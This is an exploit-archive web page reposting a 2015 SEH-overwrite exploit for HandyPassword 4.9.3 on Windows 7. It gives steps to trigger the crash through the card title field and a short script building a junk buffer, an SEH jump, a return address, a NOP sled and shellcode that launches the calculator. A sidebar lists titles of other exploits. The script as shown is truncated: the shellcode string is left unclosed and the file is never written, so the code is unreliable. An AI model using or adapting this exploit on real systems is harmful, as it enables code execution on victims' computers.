首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
HandyPassword 4.9.3 SEH Overwrite
来源:vfocus.net 作者:Un_N0n 发布时间:2015-10-27  
# Exploit Title: HandyPassword SEH-Over Write Exploit
# Date: 9/24/2015
# Exploit Author: Un_N0n
# Software Link: http://www.handypassword.com/download.shtml
# Version: 4.9.3
# Tested on: Windows 7 x86(32 BIT)
[Steps to Produce the Crash]:
1- open 'HandyPassword.exe'.
2- Then From Menu Goto New Card->Simple Login Form.
3- Click on Create Card, Enter the contents of 'Exploit.txt' Created by script in the Title Field.
4- Enter Short Random value in the rest of the fields.
5- Click on OK
~ Calculator will appear and Software will Crash.
[Code to produce Exploit]: 
junk = "A"*1144
nseh = "\xeb\x06\x90\x90" #JMP 6bytes
jmp ="\xB3\x27\x2F\x7F"  #0x7f2f27b3 From 
nops = "\x90"*50
shellcode = ("\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
junk2 = "D"*2000
file = open("exploit.txt",'w')

[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·Avant Browser Lite / Ultimate
·SiteWIX SQL Injection
·Safari User-Assisted Applescri
·HTML Compiler Remote Code Exec
·Windows 10 - pcap Driver Local
·Microsoft Compiled HTML Help R
·Easy File Sharing Web Server 7
·Winamp Bento Browser Remote Co
·The World Browser 3.0 Final -
·MacOS X 10.11 FTS Buffer Overf
·Alreader 2.5 .fb2 - SEH Based
·MacOS X 10.11 Hardlink Resourc
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved